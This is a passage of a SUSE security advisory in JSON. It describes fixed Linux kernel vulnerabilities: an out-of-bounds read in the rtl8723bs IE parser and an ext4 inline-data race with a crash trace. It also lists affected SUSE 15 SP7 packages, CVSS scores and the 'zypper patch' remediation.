"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68254"
},
{
"cve": "CVE-2025-68256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser\n\nThe Information Element (IE) parser rtw_get_ie() trusted the length\nbyte of each IE without validating that the IE body (len bytes after\nthe 2-byte header) fits inside the remaining frame buffer. A malformed\nframe can advertise an IE length larger than the available data, causing\nthe parser to increment its pointer beyond the buffer end. This results\nin out-of-bounds reads or, depending on the pattern, an infinite loop.\n\nFix by validating that (offset + 2 + len) does not exceed the limit\nbefore accepting the IE or advancing to the next element.\n\nThis prevents OOB reads and ensures the parser terminates safely on\nmalformed frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68256",
"url": "https://www.suse.com/security/cve/CVE-2025-68256"
},
{
"category": "external",
"summary": "SUSE Bug 1255138 for CVE-2025-68256",
"url": "https://bugzilla.suse.com/1255138"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
